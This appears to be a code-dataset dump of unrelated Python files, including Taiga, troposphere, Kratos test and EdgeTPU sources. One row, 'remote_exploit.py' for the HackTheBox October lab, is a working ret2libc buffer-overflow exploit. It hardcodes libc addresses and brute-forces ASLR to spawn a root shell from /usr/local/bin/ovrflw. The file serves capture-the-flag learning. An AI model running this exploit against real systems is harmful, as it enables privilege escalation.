def get_stories_with_tag(project, tag):
    """Return the project's user stories carrying *tag*.

    With the match-all sentinel every story is returned.  If nothing matches,
    a warning is printed to stderr and the process exits with status 1.
    """
    uss = project.list_user_stories()
    ret_uss = None
    if tag == c.TAG_MATCH_ALL:
        ret_uss = uss
    else:
        ret_uss = []
        for us in uss:
            if us.tags and tag in us.tags:
                ret_uss.append(us)
    if ret_uss is None or len(ret_uss) == 0:
        print(
            "Warning: no userstories matching '{:s}' was found.".format(tag),
            file=sys.stderr,
        )
        sys.exit(1)
    return ret_uss
def get_us_stauts_id_from_name(project, name):
    """Return the id of the user-story status called *name*, or None if absent."""
    statuses = project.list_user_story_statuses()
    for status in statuses:
        if status.name == name:
            return status.id
    return None
def get_us_status_name_from_id(project, status_id):
    """Return the name of the user-story status with *status_id*, or None."""
    statuses = project.list_user_story_statuses()
    for status in statuses:
        if status.id == status_id:
            return status.name
    return None
def remove_closed_stories(_project, uss):
    """Return only the user stories that are not closed (``_project`` is unused)."""
    ret_uss = []
    for us in uss:
        if not us.is_closed:
            ret_uss.append(us)
    return ret_uss
def get_statuses_sorted_by_order(project):
    """Return user-story statuses sorted ascending by their ``order`` attribute."""
    statuses = project.list_user_story_statuses()
    return sorted(statuses, key=lambda status: status.order)
def get_statuses_sorted_by_id(project):
    """Return user-story statuses sorted ascending by their ``id`` attribute."""
    statuses = project.list_user_story_statuses()
    return sorted(statuses, key=lambda status: status.id)
def get_status_id_sorted(project):
    """Return the ids of all user-story statuses, ascending by kanban order."""
    return [status.id for status in get_statuses_sorted_by_order(project)]
def get_status_and_names_sorted(project):
    """Return parallel lists ``(ids, names)`` from highest to lowest order."""
    status_ids = get_status_id_sorted(project)[::-1]
    status_names = []
    for status_id in status_ids:
        status_names.append(get_us_status_name_from_id(project, status_id))
    return status_ids, status_names
def get_dot_header(name, title):
    """Render the Graphviz digraph opening for graph *name* labelled *title*."""
    return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
    """Return the closing brace terminating a Graphviz digraph."""
    return "}"
def read_daily_cfd(path, tag):
    """Read the tab-separated daily CFD data file for *tag* under *path*.

    Returns a list of columns: ``data[0]`` holds parsed dates, ``data[1]`` raw
    annotation strings, and later columns integer counts.  The first file row
    only determines the column count (header, not stored).  Exits the process
    with status 2 if the file cannot be read.
    """
    data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
    data_path = "{:s}/{:s}".format(path, data_file)
    data = []
    try:
        with open(data_path, "r", encoding="utf-8") as fdata:
            row = 0
            for line in fdata:
                line = line.rstrip()
                parts = line.split("\t")
                if row == 0:
                    # NOTE(review): allocates one more column than the file
                    # has; the last list stays empty — presumably reserved.
                    data = [[] for _ in range(len(parts) + 1)]
                else:
                    for col in range(len(parts)):
                        value = parts[col]
                        if col == 0:  # first column: ISO dates
                            value = dt.datetime.strptime(value, "%Y-%m-%d")
                        elif col == 1:  # second column: free-text annotations
                            pass
                        else:
                            value = int(value)
                        data[col].append(value)
                row += 1
    except IOError as e:
        print(
            "Could not read {:s}, error: {:s}".format(data_path, str(e)),
            file=sys.stderr,
        )
        sys.exit(2)
    return data
class assert_args:
    """Decorator asserting required keys exist (non-None) in an args mapping.

    On a missing argument an error message is printed and 1 is returned as an
    exit status; otherwise the wrapped function is called.

    NOTE(review): the wrapper discards the wrapped function's return value
    (returns None on success) — probably should ``return func(args)``; confirm.
    """
    def __init__(self, *args):
        # Names that must be present and non-None in the args mapping.
        self.needed_args = args
    def __call__(self, func):
        dec = self
        def wrapper(args):
            for arg in dec.needed_args:
                if arg not in args or args[arg] is None:
                    print("Required argument ''{:s}' was not supplied on commandline or set in config file.".format(arg))
                    return 1
            func(args)
        return wrapper
| true | true |
f72ebbd1000cb065fe77e17ce2acc68b098d41f3 | 522 | py | Python | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2012-2022, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
def validate_listenertls_mode(listenertls_mode):
    """
    Validate the Mode value of a ListenerTls resource.

    Property: ListenerTls.Mode
    """
    valid_modes = ("STRICT", "PERMISSIVE", "DISABLED")
    if listenertls_mode in valid_modes:
        return listenertls_mode
    raise ValueError(
        "ListernerTls Mode must be one of: %s" % ", ".join(valid_modes)
    )
| 26.1 | 86 | 0.685824 |
def validate_listenertls_mode(listenertls_mode):
    """
    Validate Mode for ListenerTls; returns the value or raises ValueError.

    Property: ListenerTls.Mode
    """
    VALID_LISTENERTLS_MODE = ("STRICT", "PERMISSIVE", "DISABLED")
    if listenertls_mode not in VALID_LISTENERTLS_MODE:
        raise ValueError(
            "ListernerTls Mode must be one of: %s" % ", ".join(VALID_LISTENERTLS_MODE)
        )
    return listenertls_mode
| true | true |
f72ebc3e4aa53fcb0695239a45e7c14928a36718 | 1,159 | py | Python | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | 1 | 2021-10-04T21:59:34.000Z | 2021-10-04T21:59:34.000Z | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
lang_map = {
'python': 'ai.backend.kernel.python.Runner',
'c': 'ai.backend.kernel.c.Runner',
'cpp': 'ai.backend.kernel.cpp.Runner',
'golang': 'ai.backend.kernel.golang.Runner',
'rust': 'ai.backend.kernel.rust.Runner',
'java': 'ai.backend.kernel.java.Runner',
'haskell': 'ai.backend.kernel.haskell.Runner',
'julia': 'ai.backend.kernel.julia.Runner',
'lua': 'ai.backend.kernel.lua.Runner',
'nodejs': 'ai.backend.kernel.nodejs.Runner',
'octave': 'ai.backend.kernel.octave.Runner',
'php': 'ai.backend.kernel.php.Runner',
'r': 'ai.backend.kernel.r.Runner',
'scheme': 'ai.backend.kernel.scheme.Runner',
'git': 'ai.backend.kernel.git.Runner',
'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
    """Parse runner arguments: an optional ``--debug`` flag plus the kernel language."""
    cli_parser = argparse.ArgumentParser()
    cli_parser.add_argument('--debug', action='store_true', default=False)
    cli_parser.add_argument('lang', type=str, choices=lang_map.keys())
    return cli_parser.parse_args(args)
| 29.717949 | 70 | 0.672131 | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
lang_map = {
'python': 'ai.backend.kernel.python.Runner',
'c': 'ai.backend.kernel.c.Runner',
'cpp': 'ai.backend.kernel.cpp.Runner',
'golang': 'ai.backend.kernel.golang.Runner',
'rust': 'ai.backend.kernel.rust.Runner',
'java': 'ai.backend.kernel.java.Runner',
'haskell': 'ai.backend.kernel.haskell.Runner',
'julia': 'ai.backend.kernel.julia.Runner',
'lua': 'ai.backend.kernel.lua.Runner',
'nodejs': 'ai.backend.kernel.nodejs.Runner',
'octave': 'ai.backend.kernel.octave.Runner',
'php': 'ai.backend.kernel.php.Runner',
'r': 'ai.backend.kernel.r.Runner',
'scheme': 'ai.backend.kernel.scheme.Runner',
'git': 'ai.backend.kernel.git.Runner',
'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
    """Parse command-line arguments: ``--debug`` flag and required ``lang``."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--debug', action='store_true', default=False)
    parser.add_argument('lang', type=str, choices=lang_map.keys())
    return parser.parse_args(args)
| true | true |
f72ebdd68a8fe652c399e7e2317e2c40df3f83a1 | 840 | py | Python | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
# Build a media list (data/media.csv) from the per-page JSON files under tmp/.
files = glob.glob("tmp/*.json")
rows = []
# NOTE(review): "Thubmnail" (sic) is written into the CSV header; downstream
# consumers may depend on the typo, so it is left untouched here.
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
    filename = file.split("/")[-1]
    # File names apparently look like "<id>_<page>.json"; keep pages >= 1.
    tmp = filename.replace(".json", "").split("_")
    page = int(tmp[1])
    if page >= 1:
        print(filename)
        # Open the JSON file
        f = open(file)
        # Parse the file object into Python data
        data = json.load(f)
        # Close the file
        f.close()
        rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| 17.87234 | 97 | 0.608333 | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
# Build a media list (data/media.csv) from the per-page JSON files under tmp/.
files = glob.glob("tmp/*.json")
rows = []
# NOTE(review): "Thubmnail" typo is kept — consumers may rely on it.
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
    filename = file.split("/")[-1]
    # File names apparently look like "<id>_<page>.json"; keep pages >= 1.
    tmp = filename.replace(".json", "").split("_")
    page = int(tmp[1])
    if page >= 1:
        print(filename)
        f = open(file)
        data = json.load(f)
        f.close()
        rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| true | true |
f72ebe8dc117d55ab1f3ff02c98054a97ce7d90a | 5,820 | py | Python | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | # import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import Iga test factory tests
from iga_test_factory import SinglePatchTest as SinglePatchTest
# Truss tests - python based
from truss_element_tests import TrussElementTests as TTrussElementTests
# Membrane tests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
# 3p Shell KL - python based
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
# 3p Shell KL
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
# 5p Shell Hierarchic
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
# 5p Shell
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
# Weak support tests
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
# Coupling/C_0 tests
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
# Rotation/G_1 coupling tests
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
# Nurbs Volume tests
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
# Modelers tests
from test_modelers import TestModelers as TTestModelers
has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
    ''' Populates the test suites to run.
    Populates the test suites to run. At least, it should populate the suites:
    "small", "nightly" and "all".
    Return
    ------
    suites: A dictionary of suites
        The set of suites with its test_cases added.
    '''
    suites = KratosUnittest.KratosSuites
    smallSuite = suites['small']
    smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
        # Single patch test - checks iga essentials
        SinglePatchTest,
        # Truss tests
        TTrussElementTests,
        # Membrane tests
        MembraneSinglePatchFourPointSailLinearStatic,
        MembraneSinglePatchFourPointSailNonLinearStatic,
        # 3p Shell KL
        TShell3pElementTests,
        ScordelisRoofShell3pTest,
        LinearBeamShell3pTest,
        # 5p Shell Director
        ScordelisRoofShell5pTest,
        # Weak support tests
        SinglePatchRefinedSupportPenaltyTest,
        SinglePatchRefinedSupportLagrangeTest,
        # Coupling tests
        TwoPatchCouplingPenaltyShell3pTest,
        TwoPatchCouplingLagrangeShell3pTest,
        TwoPatchRefinedCouplingPenaltyMembraneTest,
        TwoPatchRefinedCouplingLagrangeMembraneTest,
        # Rotation/G_1 coupling tests
        TwoPatchCantileverCouplingPenaltyTest,
        TwoPatchCantileverRefinedCouplingPenaltyTest,
        # Volumes
        TTestNurbsVolumeElements,
        # Modelers
        TTestModelers
    ]))
    # Nitsche-based tests are gated on the FEAST solver being available
    # in LinearSolversApplication.
    if has_linear_solvers_application:
        from KratosMultiphysics import LinearSolversApplication
        if LinearSolversApplication.HasFEAST():
            smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
                # Weak support Nitsche test
                SinglePatchRefinedSupportNitscheTest,
                # Coupling Nitsche tests
                TwoPatchCouplingNitscheShell3pTest,
                TwoPatchRefinedCouplingNitscheMembraneTest
            ]))
        else:
            print("FEAST not available in LinearSolversApplication")
    # The nightly suite contains everything in "small" plus the slower tests below.
    nightSuite = suites['nightly']
    nightSuite.addTests(smallSuite)
    nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
        # Membrane tests
        MembraneSinglePatchFourPointSailImplicitDynamic,
        # 5p Shell Hierarchic
        TShell5pHierarchicLinearThickBeamTest,
        TShell5pHierarchicLinearScordelisTest,
        TShell5pHierarchicNonLinearThickBeamTest
    ]))
    allSuite = suites['all']
    allSuite.addTests(nightSuite)
    return suites
if __name__ == '__main__':
    # Run all registered IGA test suites when executed directly.
    KratosUnittest.runTests(AssembleTestSuites())
| 46.56 | 127 | 0.813746 |
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
import KratosMultiphysics.KratosUnittest as KratosUnittest
from iga_test_factory import SinglePatchTest as SinglePatchTest
from truss_element_tests import TrussElementTests as TTrussElementTests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
from test_modelers import TestModelers as TTestModelers
has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
suites = KratosUnittest.KratosSuites
smallSuite = suites['small']
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchTest,
TTrussElementTests,
MembraneSinglePatchFourPointSailLinearStatic,
MembraneSinglePatchFourPointSailNonLinearStatic,
TShell3pElementTests,
ScordelisRoofShell3pTest,
LinearBeamShell3pTest,
ScordelisRoofShell5pTest,
SinglePatchRefinedSupportPenaltyTest,
SinglePatchRefinedSupportLagrangeTest,
TwoPatchCouplingPenaltyShell3pTest,
TwoPatchCouplingLagrangeShell3pTest,
TwoPatchRefinedCouplingPenaltyMembraneTest,
TwoPatchRefinedCouplingLagrangeMembraneTest,
TwoPatchCantileverCouplingPenaltyTest,
TwoPatchCantileverRefinedCouplingPenaltyTest,
TTestNurbsVolumeElements,
TTestModelers
]))
if has_linear_solvers_application:
from KratosMultiphysics import LinearSolversApplication
if LinearSolversApplication.HasFEAST():
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchRefinedSupportNitscheTest,
TwoPatchCouplingNitscheShell3pTest,
TwoPatchRefinedCouplingNitscheMembraneTest
]))
else:
print("FEAST not available in LinearSolversApplication")
nightSuite = suites['nightly']
nightSuite.addTests(smallSuite)
nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
MembraneSinglePatchFourPointSailImplicitDynamic,
TShell5pHierarchicLinearThickBeamTest,
TShell5pHierarchicLinearScordelisTest,
TShell5pHierarchicNonLinearThickBeamTest
]))
allSuite = suites['all']
allSuite.addTests(nightSuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| true | true |
f72ebf2c577dad9380f79aaf1c4edf5bb78e7756 | 2,106 | py | Python | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 20 | 2021-04-03T09:08:10.000Z | 2022-02-08T23:27:12.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 2 | 2021-04-03T05:41:45.000Z | 2021-09-30T09:38:36.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 3 | 2021-04-16T21:54:02.000Z | 2021-12-17T16:39:04.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 Pieter Wuille
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utility functions related to output descriptors"""
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
"""Internal function that computes the descriptor checksum."""
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
"""Internal function that does the character to symbol expansion"""
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
"""Add a checksum to a descriptor without"""
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
"""Verify that the checksum is correct in a descriptor"""
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| 37.607143 | 116 | 0.603039 |
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| true | true |
f72ebf40c45cdd85f1466235d3246a9f0f02d062 | 263 | py | Python | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | 1 | 2022-03-18T02:53:26.000Z | 2022-03-18T02:53:26.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | 1 | 2022-02-26T22:33:51.000Z | 2022-02-26T22:33:51.000Z | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
] | null | null | null | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| 21.916667 | 65 | 0.707224 | import logging
import sys
import os
logging.basicConfig(
level=logging.getLevelName(os.getenv("LOG_LEVEL") or "INFO"),
format="[%(asctime)s] [%(levelname)s] %(message)s",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger = logging.getLogger()
| true | true |
f72ebf692ce4d13b38c4b06937c4b2c86a362b7e | 810 | py | Python | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | null | null | null | Machines/October/remote_exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | [
"CNRI-Python"
] | 1 | 2021-07-27T12:56:03.000Z | 2021-07-27T12:56:03.000Z | #
# Privilege Escalation Exploit for hackTheBox October
#
# From IppSec https://youtu.be/K05mJazHhF4
#
from subprocess import call
import struct
# libc base address using:
# ldd /usr/local/bin/ovrflw | grep libc
libc_base_addr = 0xb75e0000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
system_off = 0x00040310
exit_off = 0x00033260
# strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| 21.891892 | 62 | 0.691358 |
from subprocess import call
import struct
libc_base_addr = 0xb75e0000
system_off = 0x00040310
exit_off = 0x00033260
binsh_off = 0x00162bac
binsh_addr = struct.pack("<I", libc_base_addr + binsh_off)
system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
junk = ('A' * 112)
payload = junk + system_addr + exit_addr + binsh_addr
i = 0
while (i < 512):
print("Try: %s" % i)
i += 1
ret = call(["/usr/local/bin/ovrflw", payload])
| true | true |
f72ec08d1ab18ada95fe41cc5b706441b9da8ce8 | 6,871 | py | Python | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | homeassistant/components/edgetpu/image_processing.py | thecrazymonkey/home-assistant | 348b347ed165c88559b40ce04feb5720e91253bf | [
"Apache-2.0"
] | null | null | null | """Support for performing EdgeTPU classification on images."""
import logging
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_ENTITY_ID, CONF_NAME, CONF_SOURCE, PLATFORM_SCHEMA,
ImageProcessingEntity)
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = 'matches'
ATTR_SUMMARY = 'summary'
ATTR_TOTAL_MATCHES = 'total_matches'
CONF_CATEGORIES = 'categories'
CONF_CATEGORY = 'category'
CONF_FILE_OUT = 'file_out'
CONF_PATH = 'path'
CONF_LABELS = 'labels'
CONF_MODEL = 'model'
CONF_MODEL_DIR = 'model_dir'
CONF_TPU_DEVICE = 'device'
CONF_TPU_TOP_K = 'top_k'
CONF_TPU_THRESHOLD = 'threshold'
CONF_TPU_KEEP_ASPECT_RATIO = 'keep_aspect_ratio'
CONF_TPU_RESAMPLE = 'resample'
